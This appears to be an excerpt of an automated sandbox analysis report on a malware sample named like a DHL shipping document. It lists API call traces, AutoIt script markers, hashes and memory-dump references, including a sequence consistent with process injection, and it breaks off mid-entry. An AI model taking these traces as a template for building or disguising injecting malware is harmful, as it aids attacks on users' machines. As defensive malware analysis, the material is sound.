                                                                                      Similarity
                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 2583163307-0
                                                                                      • Opcode ID: 96d726b2667def3e990c527d3b3c77b87c661fff102caef1b11c0dd57ee168ce
                                                                                      • Instruction ID: 9963398a8bce6b2e2460ed2134b7352c9bb5b0832c1517854dc2c022a00a782a
                                                                                      • Opcode Fuzzy Hash: 96d726b2667def3e990c527d3b3c77b87c661fff102caef1b11c0dd57ee168ce
                                                                                      • Instruction Fuzzy Hash: 94014E336056603AD6267734BC45B7E6B49CB81774F3D015BF8189B3D2DEA0CC85A270
                                                                                      APIs
                                                                                      • TranslateMessage.USER32(?), ref: 00DADB7B
                                                                                      • DispatchMessageW.USER32(?), ref: 00DADB89
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DADB9F
                                                                                      • Sleep.KERNEL32(0000000A), ref: 00DADBB1
                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00DF1CC9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                      • String ID:
                                                                                      • API String ID: 3288985973-0
                                                                                      • Opcode ID: de0cce58e0473f1f295ff909073333240fbfe446f437d1cef40a8ece26e45712
                                                                                      • Instruction ID: 0fae118f7f6cbdab78deb912a2405608f35396f45047b416d04358c614f4629e
                                                                                      • Opcode Fuzzy Hash: de0cce58e0473f1f295ff909073333240fbfe446f437d1cef40a8ece26e45712
                                                                                      • Instruction Fuzzy Hash: E8F05E30604344DBE734CB718C49FEA77B9EB85310F244519E65AA30C0DB30D488CB36
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00E12CD4,?,?,?,00000004,00000001), ref: 00E12FF2
                                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E13006
                                                                                      • CloseHandle.KERNEL32(00000000,?,00E12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E1300D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                      • String ID:
                                                                                      • API String ID: 3397143404-0
                                                                                      • Opcode ID: 5b38b01f5147ba7d91f3eb3035d6439f6c3b578eea7a8ba78590a7118cbe95ce
                                                                                      • Instruction ID: 0ea1725bc1297ccebd8f36ed55d72fa15c2edd646ce83cdb5d331f76a55f4245
                                                                                      • Opcode Fuzzy Hash: 5b38b01f5147ba7d91f3eb3035d6439f6c3b578eea7a8ba78590a7118cbe95ce
                                                                                      • Instruction Fuzzy Hash: 58E0CD322813147BD2301766BC0DFCB3E6CDBCAF75F214210F759750D146A0950553A8
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 00DB17F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID: CALL
                                                                                      • API String ID: 1385522511-4196123274
                                                                                      • Opcode ID: 15b73698ccaddef1928c43d1c65a60c380f18d5c681f31109472712ef69a8b7a
                                                                                      • Instruction ID: 83333637e2890fc0eb63e643cb8b41908c0b9bcee7aa4848fa98548f484b9f3c
                                                                                      • Opcode Fuzzy Hash: 15b73698ccaddef1928c43d1c65a60c380f18d5c681f31109472712ef69a8b7a
                                                                                      • Instruction Fuzzy Hash: 37228974608241DFC714DF24C8A0AAABBF1FF85314F68891DF5969B361D731E845CBA2
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00E16F6B
                                                                                        • Part of subcall function 00DA4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DA4EFD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad_wcslen
                                                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                                                      • API String ID: 3312870042-2806939583
                                                                                      • Opcode ID: 8b50a2515601e756a07ce662e51dd2a3a3fc3a1d4b760595a2cd6c2fed76f1b8
                                                                                      • Instruction ID: cb5d1e85f326316ec952f92b2a30e6ad5d7b594f196d69a023c2690b3c31a5e3
                                                                                      • Opcode Fuzzy Hash: 8b50a2515601e756a07ce662e51dd2a3a3fc3a1d4b760595a2cd6c2fed76f1b8
                                                                                      • Instruction Fuzzy Hash: 11B185315083019FCB14EF24C8919AEB7E5EF95714F04895DF496972A1EB30ED89CBB2
                                                                                      APIs
                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DA3908
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_
                                                                                      • String ID:
                                                                                      • API String ID: 1144537725-0
                                                                                      • Opcode ID: b70c608635e82d737e6f15f4839b8a1ff4cdefb4ad8aa3156ebf3d562ba48764
                                                                                      • Instruction ID: 7a28f57161e40476988310a889b58703e0336dd741ab472821b783e911af25a3
                                                                                      • Opcode Fuzzy Hash: b70c608635e82d737e6f15f4839b8a1ff4cdefb4ad8aa3156ebf3d562ba48764
                                                                                      • Instruction Fuzzy Hash: BF319170504301DFD720DF79D885B97BBE8FB4A708F14096EF59993280E775AA48CB62
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 00FEE653
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FEE6E9
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FEE70B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1751009954.0000000000FEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FEC000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_fec000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                      • Instruction ID: 584ec195fc4083ce397c82193aa569c4678c8f47a6577f51a17c2923b25c5dc8
                                                                                      • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                      • Instruction Fuzzy Hash: D912BD24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E85CF5A
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                      • Instruction ID: 7c232d9b83e9dd71ed2a0831647df8b35384769fa3e40314b1d3bad50c61d398
                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                      • Instruction Fuzzy Hash: A031E475A00109DBC718CF59D8C0AA9FBA5FF49300B2886A5E84ACF656D731EDD1CBE0
                                                                                      APIs
                                                                                        • Part of subcall function 00DA4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DA4EDD,?,00E71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DA4E9C
                                                                                        • Part of subcall function 00DA4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DA4EAE
                                                                                        • Part of subcall function 00DA4E90: FreeLibrary.KERNEL32(00000000,?,?,00DA4EDD,?,00E71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DA4EC0
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DA4EFD
                                                                                        • Part of subcall function 00DA4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DE3CDE,?,00E71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DA4E62
                                                                                        • Part of subcall function 00DA4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DA4E74
                                                                                        • Part of subcall function 00DA4E59: FreeLibrary.KERNEL32(00000000,?,?,00DE3CDE,?,00E71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DA4E87
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 2632591731-0
                                                                                      • Opcode ID: f516386708fc10630bb6f5c8fada3e58b05815abfaa91d94b70f6aeb8e4cf0e3
                                                                                      • Instruction ID: 5ca831e17edc014026329894164e52db6954c486ce45ad3d5554110371e42953
                                                                                      • Opcode Fuzzy Hash: f516386708fc10630bb6f5c8fada3e58b05815abfaa91d94b70f6aeb8e4cf0e3
                                                                                      • Instruction Fuzzy Hash: 1E110132610205AECB14BB60DC16FAD77A4EF81B10F20842DF552B71C1EEB4EA449770
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: __wsopen_s
                                                                                      • String ID:
                                                                                      • API String ID: 3347428461-0
                                                                                      • Opcode ID: a64d1eaa3e5ee57f835d7319103dbb0ba0c99476b89643780e5a121b3043cef4
                                                                                      • Instruction ID: 40e21f75cc5747a6c3d8728b9ff58761d5511c70d897826ce07779736e9a84c1
                                                                                      • Opcode Fuzzy Hash: a64d1eaa3e5ee57f835d7319103dbb0ba0c99476b89643780e5a121b3043cef4
                                                                                      • Instruction Fuzzy Hash: 6111187590420AAFCB06DF58E941A9A7BF5EF48314F14405AF808AB312DB31EA15DBB5
                                                                                      APIs
                                                                                        • Part of subcall function 00DD4C7D: RtlAllocateHeap.NTDLL(00000008,00DA1129,00000000,?,00DD2E29,00000001,00000364,?,?,?,00DCF2DE,00DD3863,00E71444,?,00DBFDF5,?), ref: 00DD4CBE
                                                                                      • _free.LIBCMT ref: 00DD506C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 614378929-0
                                                                                      • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                      • Instruction ID: 17bcd6433005386da676adad7590cbca0a60db0a380781859a3e2c15257c3ee9
                                                                                      • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                      • Instruction Fuzzy Hash: 22014E722047045BE3318F55D84196AFBECFB85370F25051EE184833C0E730A805C774
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                      • Instruction ID: 950c51ba5c32353b0be0cff0583e76b6b009d340efbe6363a14d2d4c8deababa
                                                                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                      • Instruction Fuzzy Hash: 32F0F472561A11A7C6323AB98C05F6A339DDF62330F140B2EF421932D2DB74E8029AB5
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 176396367-0
                                                                                      • Opcode ID: 98ad5ad2a30495acd569bab0290c22198dc8be697418d8b11e2c8fcba327d5f9
                                                                                      • Instruction ID: 6758ae189df19997a1f62e4b1f48b94e66c433acdcc0dfb0131d3f0bf89f654f
                                                                                      • Opcode Fuzzy Hash: 98ad5ad2a30495acd569bab0290c22198dc8be697418d8b11e2c8fcba327d5f9
                                                                                      • Instruction Fuzzy Hash: 7DF0A4B3600601AED7159F29DC06FA6BB98EB44760F10852EF61ACB1D1DB31E5108AB0
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,00DA1129,00000000,?,00DD2E29,00000001,00000364,?,?,?,00DCF2DE,00DD3863,00E71444,?,00DBFDF5,?), ref: 00DD4CBE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 76eca3cf624038a603cf812d43a340aeb7f5e3e4f4fd71156f6b1d4cdf8ac6fd
                                                                                      • Instruction ID: 3320e1b28f6410f79b8967693e75a18325a5e1759c248898ba35902adadb792f
                                                                                      • Opcode Fuzzy Hash: 76eca3cf624038a603cf812d43a340aeb7f5e3e4f4fd71156f6b1d4cdf8ac6fd
                                                                                      • Instruction Fuzzy Hash: A8F0B43162322567DB215F6A9D09F5A3789EF917A1B19411BB819AB380CA70D80196B0
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00E71444,?,00DBFDF5,?,?,00DAA976,00000010,00E71440,00DA13FC,?,00DA13C6,?,00DA1129), ref: 00DD3852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: ebbb7b7bea1268fa1111748a4ad2ad4202814fb76fe99f68fdb9fc820d81bcc4
                                                                                      • Instruction ID: a01b525cd4106fff27f454a36f4795911971aa097f0b83c67e46748abdd68e9f
                                                                                      • Opcode Fuzzy Hash: ebbb7b7bea1268fa1111748a4ad2ad4202814fb76fe99f68fdb9fc820d81bcc4
                                                                                      • Instruction Fuzzy Hash: B2E0E5311023256AD62126679C04F9A3A4EEF427B0F1D002ABC44A7780CB61DD01A2F2
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,?,00E71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DA4F6D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: c5cd18a60355a122162c573e42eea1b9212ed06f45dcfdd213165d7f96a30fb0
                                                                                      • Instruction ID: 9ad631e16097f141bdec2fa52d871c0f0712695bbcc36d4fedb9325eba975371
                                                                                      • Opcode Fuzzy Hash: c5cd18a60355a122162c573e42eea1b9212ed06f45dcfdd213165d7f96a30fb0
                                                                                      • Instruction Fuzzy Hash: AAF0A97100A352CFCB348F20D490822BBF0EF42329324997EE1EA83620C7B1D848EF21
                                                                                      APIs
                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DA2DC4
                                                                                        • Part of subcall function 00DA6B57: _wcslen.LIBCMT ref: 00DA6B6A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongNamePath_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 541455249-0
                                                                                      • Opcode ID: a0a94781772d70e00ed52ae8fa87b00ed0340dbf2ce0543676a6619ca0e0e673
                                                                                      • Instruction ID: cc5cc2989008425d051dcf7e9915d6f97ae71f92b0c06edd3b73902febbd3495
                                                                                      • Opcode Fuzzy Hash: a0a94781772d70e00ed52ae8fa87b00ed0340dbf2ce0543676a6619ca0e0e673
                                                                                      • Instruction Fuzzy Hash: B9E0CD766041245BC711A2599C05FDA77DDDFC8790F0400B1FD09E7258D970ED8486B0
                                                                                      APIs
                                                                                        • Part of subcall function 00DA3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DA3908
                                                                                        • Part of subcall function 00DAD730: GetInputState.USER32 ref: 00DAD807
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA2B6B
                                                                                        • Part of subcall function 00DA30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00DA314E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
